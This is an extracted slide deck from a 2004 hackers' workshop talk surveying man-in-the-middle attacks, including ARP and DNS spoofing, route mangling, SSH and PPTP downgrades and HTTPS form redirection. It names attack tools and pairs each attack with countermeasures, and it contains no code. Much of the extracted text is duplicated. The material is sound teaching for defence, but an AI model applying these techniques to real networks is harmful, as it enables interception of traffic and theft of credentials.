IIT Kanpur Hackers Workshop 2004 23, 24 Feb 2004 1 A current analysis of man in the middle (mitm)...

11IIT Kanpur Hacker’s Workshop 2004

23, 24 Feb 2004

A current analysis of A current analysis of man in the middle (mitm) man in the middle (mitm)

attacksattacksSachin Deodhar <[email protected]>


23, 24 Feb 2004

The scenarioThe scenario

Server

Client

Attacker


23, 24 Feb 2004

MITM attack scenarios TOCMITM attack scenarios TOC

Different attacks in different scenarios:Different attacks in different scenarios:

LOCAL AREA NETWORK:LOCAL AREA NETWORK:- - ARP poisoningARP poisoning - - DNS spoofingDNS spoofing - - STP STP manglingmangling- - PortPort stealingstealing

FROM LOCAL TO REMOTEFROM LOCAL TO REMOTE (through a gateway): (through a gateway):- - ARP poisoningARP poisoning - - DNS spoofingDNS spoofing - - DHCP spoofing DHCP spoofing - - ICMP redirectionICMP redirection - - IRDP spoofingIRDP spoofing - - route manglingroute mangling

REMOTE: REMOTE: - - DNS poisoningDNS poisoning - - traffictraffic tunnelingtunneling - - route route manglingmangling


23, 24 Feb 2004

MITM attack techniquesMITM attack techniquesThe local scenarioThe local scenario


23, 24 Feb 2004

Local attacks (1)Local attacks (1)ARP poisoningARP poisoning

ARP is stateless (we all knows how it works and ARP is stateless (we all knows how it works and what the problems are)what the problems are)

Some operating systems do not update an entry if it Some operating systems do not update an entry if it is not already in the cache, others accept only the is not already in the cache, others accept only the first received reply (e.g. Solaris)first received reply (e.g. Solaris)

The attacker can forge spoofed ICMP packets to The attacker can forge spoofed ICMP packets to force the host to make an ARP request. Immediately force the host to make an ARP request. Immediately after the ICMP it sends the fake ARP reply after the ICMP it sends the fake ARP reply


23, 24 Feb 2004

The scenarioThe scenario

Server

Client Attacker

Gratuitous ARP (forged)



23, 24 Feb 2004

Local attacks (1)Local attacks (1)ARP poisoning ARP poisoning - Tools- Tools

ettercapettercap ((http://ettercap.sf.nethttp://ettercap.sf.net)) PoisoningPoisoning SniffingSniffing HijackingHijacking FilteringFiltering SSH v.1 sniffing (transparent attack)SSH v.1 sniffing (transparent attack)

dsniffdsniff ((http://www.monkey.org/~dugsong/dsniffhttp://www.monkey.org/~dugsong/dsniff)) PoisoningPoisoning SniffingSniffing SSH v.1 sniffing (proxy attack)SSH v.1 sniffing (proxy attack)


23, 24 Feb 2004

Local attacks (1)Local attacks (1)ARP poisoning ARP poisoning - countermeasures- countermeasures

YESYES - passive monitoring (arpwatch) - passive monitoring (arpwatch)YESYES - active monitoring (ettercap) - active monitoring (ettercap)YESYES - IDS (detect but not avoid) - IDS (detect but not avoid)

YESYES - Static ARP entries (avoid it) - Static ARP entries (avoid it) YESYES - Secure-ARP (public key authentication) - Secure-ARP (public key authentication)


23, 24 Feb 2004

Local attacks (2)Local attacks (2)DNS spoofingDNS spoofing

HOST DNSserverX.localdomain.in

10.1.1.50

MITM

10.1.1.1

If the attacker is able to sniff the ID of the DNS request,he/she can reply before the real DNS server


23, 24 Feb 2004

Local attacks (2)Local attacks (2)DNS spoofing DNS spoofing - tools- tools

ettercapettercap ((http://ettercap.sf.nethttp://ettercap.sf.net)) Phantom pluginPhantom plugin

dsniffdsniff ((http://www.monkey.org/~dugsong/dsniffhttp://www.monkey.org/~dugsong/dsniff)) DnsspoofDnsspoof

zodiac zodiac ((http://www.packetfactory.com/http://www.packetfactory.com/ProjectsProjects//zodiaczodiac))


23, 24 Feb 2004

Local attacks (2)Local attacks (2)DNS spoofing DNS spoofing - countermeasures- countermeasures

YESYES - detect multiple replies (IDS) - detect multiple replies (IDS)

YESYES - use lmhost or host file for static - use lmhost or host file for static resolution of critical hostsresolution of critical hosts

YESYES - DNSSEC - DNSSEC


23, 24 Feb 2004

Local attacks (3)Local attacks (3)STP manglingSTP mangling

It is not a real MITM attack since the It is not a real MITM attack since the attacker is able to receive only attacker is able to receive only “unmanaged” traffic“unmanaged” traffic

The attacker can forge BPDU with high The attacker can forge BPDU with high priority pretending to be the new root of priority pretending to be the new root of the spanning treethe spanning tree


23, 24 Feb 2004

Local attacks (3)Local attacks (3)STP mangling STP mangling - tools- tools

EttercapEttercap ((http://ettercap.sf.nethttp://ettercap.sf.net))

With the Lamia pluginWith the Lamia plugin


23, 24 Feb 2004

Local attacks (3)Local attacks (3)STP mangling STP mangling - countermeasures- countermeasures

YESYES - Disable STP on VLAN without loops - Disable STP on VLAN without loops

YESYES - Root Guard, BPDU Guard. - Root Guard, BPDU Guard.


23, 24 Feb 2004

Local attacks (4)Local attacks (4)Port stealing Port stealing

Attacker floods the switch with forged gratuitous ARP packets with the Attacker floods the switch with forged gratuitous ARP packets with the source MAC address being that of the target host and the destination MAC source MAC address being that of the target host and the destination MAC address being that of the attacker.address being that of the attacker.Since the destination MAC address of each flooding packet is the attackers Since the destination MAC address of each flooding packet is the attackers MAC address, the switch will not forward these packets to other ports, MAC address, the switch will not forward these packets to other ports, meaning they will not be seen by other hosts on the networkmeaning they will not be seen by other hosts on the networkA race condition: because the target host will send packets too. The switch A race condition: because the target host will send packets too. The switch will see packets with the same source MAC address on two different ports will see packets with the same source MAC address on two different ports and will constantly change the binding of the MAC address to the port. and will constantly change the binding of the MAC address to the port. Remember that the switch binds a MAC address to a single port. If the Remember that the switch binds a MAC address to a single port. If the attacker is fast enough, packets intended for the target host will be sent to attacker is fast enough, packets intended for the target host will be sent to the attacker’s switch port and not the target host.the attacker’s switch port and not the target host.When a packet arrives, the attacker performs an ARP request asking for the When a packet arrives, the attacker performs an ARP request asking for the target hosts’ IP address. Next, the attacker stops the flooding and waits for target hosts’ IP address. Next, the attacker stops the flooding and waits for the ARP reply. When the attacker receives the reply, it means that the the ARP reply. When the attacker receives the reply, it means that the target hosts’ switch port has been restored to its original binding.target hosts’ switch port has been restored to its original binding.The attacker now sniffs the packet and forwards it to the target host and The attacker now sniffs the packet and forwards it to the target host and restarts the attack ad naseum …restarts the attack ad naseum …


23, 24 Feb 2004

Local attacks (5)Local attacks (5)Port stealing how toPort stealing how to

1 2 3

A Attacker B

Layer 2 switch



23, 24 Feb 2004

Local attacks (4)Local attacks (4)Port stealing Port stealing - tools- tools

ettercapettercap ( (http://ettercap.sf.nethttp://ettercap.sf.net)) With the Confusion pluginWith the Confusion plugin


23, 24 Feb 2004

Local Attacks (4)Local Attacks (4)Port stealing Port stealing - countermeasures- countermeasures

YESYES - port security on the switch - port security on the switch


23, 24 Feb 2004

Attack techniquesAttack techniquesFrom local to remoteFrom local to remote


23, 24 Feb 2004

Local to remote attacks (1)Local to remote attacks (1)DHCP spoofingDHCP spoofing

The DHCP requests are made in broadcast The DHCP requests are made in broadcast mode. mode.

If the attacker replies before the real DHCP If the attacker replies before the real DHCP server it can manipulate:server it can manipulate:

IP address of the victimIP address of the victim GW address assigned to the victimGW address assigned to the victim DNS addressDNS address


23, 24 Feb 2004

Local to remote attacks (1)Local to remote attacks (1)DHCP spoofing DHCP spoofing - countermeasures- countermeasures

YESYES - detection of multiple DHCP replies - detection of multiple DHCP replies


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (2)(2)ICMP redirectICMP redirect

G1

AT

H

T

LAN

The attacker can forge ICMP redirect packet in order to redirect traffic to himself

ICMP redirect to AT


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (2)(2)ICMP redirect ICMP redirect - tools- tools

IRPAS icmp_redirectIRPAS icmp_redirect (Phenoelit) (Phenoelit)((http://www.phenoelit.de/http://www.phenoelit.de/irpasirpas//))

icmp_rediricmp_redir (Yuri Volobuev) (Yuri Volobuev)


23, 24 Feb 2004

Local to remote attacks (2)Local to remote attacks (2)ICMP redirect ICMP redirect - countermeasures- countermeasures

YESYES - Disable the ICMP REDIRECT - Disable the ICMP REDIRECT

NONO - Linux has the “secure redirect” options but - Linux has the “secure redirect” options but it seems to be ineffective against this attackit seems to be ineffective against this attack


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (3)(3)IRDP spoofingIRDP spoofing

The attacker can forge some advertisement The attacker can forge some advertisement packet pretending to be the router for the LAN. packet pretending to be the router for the LAN. He/she can set the “preference level” and the He/she can set the “preference level” and the “lifetime” at high values to be sure the hosts will “lifetime” at high values to be sure the hosts will choose it as the preferred router.choose it as the preferred router.

The attack can be improved by sending some The attack can be improved by sending some spoofed ICMP Host Unreachable pretending to spoofed ICMP Host Unreachable pretending to be the real routerbe the real router


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (3)(3)IRDP spoofing IRDP spoofing - tools- tools

IRPAS IRPAS by Phenoelitby Phenoelit(http://www.phenoelit.de/irpas/)(http://www.phenoelit.de/irpas/)


23, 24 Feb 2004

Local to remote attacks (3)Local to remote attacks (3)IRDP spoofing IRDP spoofing - countermeasures- countermeasures

YESYES - Disable IRDP on hosts if the - Disable IRDP on hosts if the operating system permit it.operating system permit it.


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (4)(4)ROUTE manglingROUTE mangling

The attacker can forge packets for the gateway (GW) pretending to be a router with a good metric for a specified host on the internet

INTERNET GW AT

H


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (4)(4)ROUTE manglingROUTE mangling

Now the problem for the attacker is to send packets to Now the problem for the attacker is to send packets to the real destination. He/she cannot send it through GW the real destination. He/she cannot send it through GW since it is convinced that the best route is AT.since it is convinced that the best route is AT.

INTERNET GW AT

H

D

AT2Tunnel


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (4)(4)ROUTE mangling ROUTE mangling - tools- tools

IRPASIRPAS (Phenoelit) (Phenoelit)(http://www.phenoelit.de/irpas/)(http://www.phenoelit.de/irpas/)

Nemesis Nemesis (http://www.packetfactory.net/Projects/nemesis/)(http://www.packetfactory.net/Projects/nemesis/)


23, 24 Feb 2004

Local to remote attacks Local to remote attacks (4)(4)ROUTE mangling ROUTE mangling - countermeasures- countermeasures

YESYES - Disable dynamic routing protocols in - Disable dynamic routing protocols in this type of scenario this type of scenario

YES YES - Enable ACLs to block unexpected - Enable ACLs to block unexpected updateupdate

YESYES - Enable authentication on the - Enable authentication on the protocols that support authenticationprotocols that support authentication


23, 24 Feb 2004

Attacks techniquesAttacks techniquesRemote scenariosRemote scenarios


23, 24 Feb 2004

Remote attacks (1)Remote attacks (1)DNS poisoningDNS poisoning

Type 1 attackType 1 attack The attacker sends a request to the victim DNS The attacker sends a request to the victim DNS

asking for one hostasking for one host

The attacker spoofs the reply which is expected to The attacker spoofs the reply which is expected to come from the real DNScome from the real DNS

The spoofed reply must contain the correct ID (brute The spoofed reply must contain the correct ID (brute force or semi-blind guessing)force or semi-blind guessing)


23, 24 Feb 2004

Remote attacks (1)Remote attacks (1)DNS poisoningDNS poisoning

Type 2 attackType 2 attack The attacker can send a “dynamic update” to The attacker can send a “dynamic update” to

the victim DNSthe victim DNS

If the DNS processes it, it is even worst If the DNS processes it, it is even worst because it will be authoritative for those because it will be authoritative for those entriesentries


23, 24 Feb 2004

Remote attacks Remote attacks (1)(1)DNS poisoning DNS poisoning - tools- tools

ADMIdPackADMIdPack

Zodiac Zodiac (http://www.packetfactory.com/Projects/zodiac)(http://www.packetfactory.com/Projects/zodiac)


23, 24 Feb 2004

Remote attacks Remote attacks (1)(1)DNS poisoning DNS poisoning - countermeasures- countermeasures

YESYES - Use DNS with random transaction - Use DNS with random transaction ID (Bind v9)ID (Bind v9)

YESYES - DNSSec (Bind v9) allows the digital - DNSSec (Bind v9) allows the digital signature of the replies. signature of the replies.

NONO - restrict the dynamic update to a - restrict the dynamic update to a range of IPs (they can be spoofed)range of IPs (they can be spoofed)


23, 24 Feb 2004

Remote attacks Remote attacks (2)(2)Traffic tunnelingTraffic tunneling

Router 1

Gateway

INTERNET

Server

Client

Fake host

Attacker

Tunnel GRE


23, 24 Feb 2004

Remote attacks Remote attacks (2)(2)Traffic tunneling Traffic tunneling - tools- tools

ettercapettercap (http://ettercap.sf.net)(http://ettercap.sf.net) Zaratan pluginZaratan plugin

tunnelXtunnelX (http://www.phrack.com)(http://www.phrack.com)


23, 24 Feb 2004

Remote attacks Remote attacks (2)(2)Traffic tunneling Traffic tunneling - countermeasurecountermeasure

YESYES - Strong passwords and community on - Strong passwords and community on routersrouters


23, 24 Feb 2004

Remote attacks Remote attacks (3)(3)ROUTE mangling revisitedROUTE mangling revisited

The attacker aims to hijack the traffic between The attacker aims to hijack the traffic between the two victims A and Bthe two victims A and B

The attack will collect sensitive information The attack will collect sensitive information through:through: TracerouteTraceroute port scanning port scanning protoscanningprotoscanning

Quite impossible against link state protocolsQuite impossible against link state protocols


23, 24 Feb 2004


Scenario 1 aScenario 1 a(IGRP inside the AS)(IGRP inside the AS)

A B

The attacker pretends to be the GW

R1

R2


23, 24 Feb 2004


Scenario 1 b Scenario 1 b (IGRP inside the AS)(IGRP inside the AS)

A BR1

R2

R3


23, 24 Feb 2004


Scenario 2 aScenario 2 a((the traffic does not pass thru thethe traffic does not pass thru the AS) AS)

AS 1 AS 2

BG 1 BG 2

BG 3

AS 3

BGP

RIP


23, 24 Feb 2004

Remote attacks Remote attacks (3)(3)ROUTE mangling revisited - toolsROUTE mangling revisited - tools

IRPASIRPAS di Phenoelit di Phenoelit((http://www.phenoelit.de/irpas/)http://www.phenoelit.de/irpas/)

Nemesis Nemesis ((http://www.packetfactory.net/Projects/nemesis/)http://www.packetfactory.net/Projects/nemesis/)


23, 24 Feb 2004

Remote attacks Remote attacks (3)(3)ROUTE mangling revisited ROUTE mangling revisited - -

countermeasurecountermeasure

YESYES - Use routing protocol authentication - Use routing protocol authentication


23, 24 Feb 2004

ConclusionsConclusions

The security of a connection relies on:The security of a connection relies on: Proper configuration of the client (avoiding ICMP Redirect, Proper configuration of the client (avoiding ICMP Redirect,

ARP Poisoning etc.) ARP Poisoning etc.) the other endpoint infrastructure (e.g.. DNS dynamic the other endpoint infrastructure (e.g.. DNS dynamic

update),update), the strength of a third party appliances on which we don’t the strength of a third party appliances on which we don’t

have access (e.g.. Tunneling and Route Mangling).have access (e.g.. Tunneling and Route Mangling).

The best way to ensure secure communication is the correct The best way to ensure secure communication is the correct and conscious use of cryptographic systemsand conscious use of cryptographic systems both client and server sideboth client and server side at the network layer (i.e.. IPSec)at the network layer (i.e.. IPSec) at transport layer (i.e.. SSLv3) at transport layer (i.e.. SSLv3) at application layer (i.e.. PGP).at application layer (i.e.. PGP).


23, 24 Feb 2004

Once in the middle…Once in the middle…

Injection attacksInjection attacks

Key Manipulation attacksKey Manipulation attacks

Downgrade attacksDowngrade attacks

Filtering attacksFiltering attacks


23, 24 Feb 2004

Injection attacksInjection attacks

Add packets to an already established connection (only Add packets to an already established connection (only possible in full-duplex mitm)possible in full-duplex mitm)

The attacker can modify the sequence numbers and The attacker can modify the sequence numbers and keep the connection synchronized while injecting keep the connection synchronized while injecting packets. packets.

If the mitm attack is a “proxy attack” it is even easier to If the mitm attack is a “proxy attack” it is even easier to inject (there are two distinct connections)inject (there are two distinct connections)


23, 24 Feb 2004

Injection attack examples Injection attack examples Command injectionCommand injection

Useful in scenarios where a one time Useful in scenarios where a one time authentication is used (e.g. RSA token).authentication is used (e.g. RSA token).In such scenarios sniffing the password is In such scenarios sniffing the password is useless, but hijacking an already authenticated useless, but hijacking an already authenticated session is criticalsession is critical

Injection of commands to the serverInjection of commands to the server

Emulation of fake replies to the clientEmulation of fake replies to the client


23, 24 Feb 2004

Key Manipulation in the case of Key Manipulation in the case of popular VPN/crypto systemspopular VPN/crypto systems

SSH v1SSH v1

IPSECIPSEC

HTTPSHTTPS


23, 24 Feb 2004

Key Manipulation attack Key Manipulation attack example example

SSH v1SSH v1

Modification of the public key exchanged by Modification of the public key exchanged by server and clientserver and client. .

Server Client

MITM

start

KEY(rsa) KEY(rsa)

Ekey[S-Key]Ekey[S-Key]S-KEY S-KEY S-KEY

MEskey(M)

D(E(M))

D(E(M))


23, 24 Feb 2004

Key manipulation attack Key manipulation attack exampleexample

IPSECIPSEC If two or more clients share the same “secret”, each If two or more clients share the same “secret”, each

of them can impersonate the server with another of them can impersonate the server with another client.client.

Client mitm

Server

Diffie-Hellman exchange 1 – Authenticated by pre-shared secret

Diffie-Hellman exchange 2 – Authenticated by pre-shared secret

De-Crypt Packet

Re-Crypt Packet


23, 24 Feb 2004

Key manipulation attack Key manipulation attack exampleexample

HTTPSHTTPS We can create a fake certificate (eg: We can create a fake certificate (eg:

issued by Verissued by VeryySign) relying on Sign) relying on browser misconfiguration or user browser misconfiguration or user dumbness.dumbness.

Client MiM Server

Fake cert.

Real Connection to the server


23, 24 Feb 2004

Filtering attacksFiltering attacks

The attacker can modify the payload of the The attacker can modify the payload of the packets by recalculating the checksumpackets by recalculating the checksum

He/she can create filters on the flyHe/she can create filters on the fly

The length of the payload can also be changed The length of the payload can also be changed but only in full-duplex (in this case the seq has to but only in full-duplex (in this case the seq has to be adjusted)be adjusted)


23, 24 Feb 2004

Filtering attacks exampleFiltering attacks exampleCode Filtering / InjectionCode Filtering / Injection

Insertion of malicious code into web pages Insertion of malicious code into web pages or mail (javascript, trojans, virus, etc)or mail (javascript, trojans, virus, etc)

Modification on the fly of binary files during Modification on the fly of binary files during the download phase (virus, backdoor, etc)the download phase (virus, backdoor, etc)


23, 24 Feb 2004

Filtering attacks exampleFiltering attacks exampleHTTPS redirectionHTTPS redirection

Let’s see an exampleLet’s see an example

Http main page with https login form

Change form destination to http://attacker

Http post (login\password)

Auto-submitting hidden form with right authentication data

Real https authentication post

Authenticated connection

Client

Server

MiMlogin

password


23, 24 Feb 2004

Downgrade attacks for typical Downgrade attacks for typical VPN/crypto systemsVPN/crypto systems

SSH v2SSH v2

IPSECIPSEC

PPTPPPTP


23, 24 Feb 2004

Downgrade attack examples Downgrade attack examples SSH v2 SSH v2 v1 v1

Parameters exchanged by server and client can be Parameters exchanged by server and client can be substituted in the beginning of a connection. substituted in the beginning of a connection. (algorithms to be used later)(algorithms to be used later)

The attacker can force the client to initialize a SSH1 The attacker can force the client to initialize a SSH1 connection instead of SSH2.connection instead of SSH2.

The server replies in this way:The server replies in this way:SSH-1.99 -- the server supports ssh1 and ssh2 SSH-1.99 -- the server supports ssh1 and ssh2 SSH-1.51 -- the server supports ONLY ssh1 SSH-1.51 -- the server supports ONLY ssh1

The attacker makes a filter to replace “1.99” with “1.51”The attacker makes a filter to replace “1.99” with “1.51”

Possibility to circumvent known_hostsPossibility to circumvent known_hosts


23, 24 Feb 2004

Downgrade attack examples Downgrade attack examples IPSEC FailureIPSEC Failure

Block the key material exchanged on the Block the key material exchanged on the port 500 UDPport 500 UDP

End points think that the other cannot start End points think that the other cannot start an IPSEC connectionan IPSEC connection

If the client is configured in rollback mode, If the client is configured in rollback mode, there is a good chance that the user will not there is a good chance that the user will not notice that the connection is in clear textnotice that the connection is in clear text


23, 24 Feb 2004

Downgrade attack examples Downgrade attack examples PPTP attack (1)PPTP attack (1)

During negotiation phaseDuring negotiation phase Force PAP authentication (almost fails)Force PAP authentication (almost fails) Force MS-CHAPv1 from MS-CHAPv2 (easier to crack)Force MS-CHAPv1 from MS-CHAPv2 (easier to crack) Force no encryptionForce no encryption

Force re-negotiation (clear text terminate-ack)Force re-negotiation (clear text terminate-ack) Retrieve passwords from existing tunnelsRetrieve passwords from existing tunnels Perform previous attacksPerform previous attacks

Force “password change” to obtain password hashesForce “password change” to obtain password hashes Hashes can be used directly by a modified SMB or PPTP Hashes can be used directly by a modified SMB or PPTP

clientclient MS-CHAPv2 hashes are not useful (you can force v1)MS-CHAPv2 hashes are not useful (you can force v1)


23, 24 Feb 2004

Downgrade attack examples Downgrade attack examples L2TP rollbackL2TP rollback

L2TP can use IPSec ESP as transport layer (stronger L2TP can use IPSec ESP as transport layer (stronger than PPTP)than PPTP)

By default L2TP is tried before PPTPBy default L2TP is tried before PPTP

Blocking ISAKMP packets results in an IPSec failureBlocking ISAKMP packets results in an IPSec failure

Client starts a request for a PPTP tunnel (rollback)Client starts a request for a PPTP tunnel (rollback)

Now you can perform PPTP previous attacksNow you can perform PPTP previous attacks

IIT Kanpur Hackers Workshop 2004 23, 24 Feb 2004 1 A current analysis of man in the middle (mitm)...

Documents

Transcript of IIT Kanpur Hackers Workshop 2004 23, 24 Feb 2004 1 A current analysis of man in the middle (mitm)...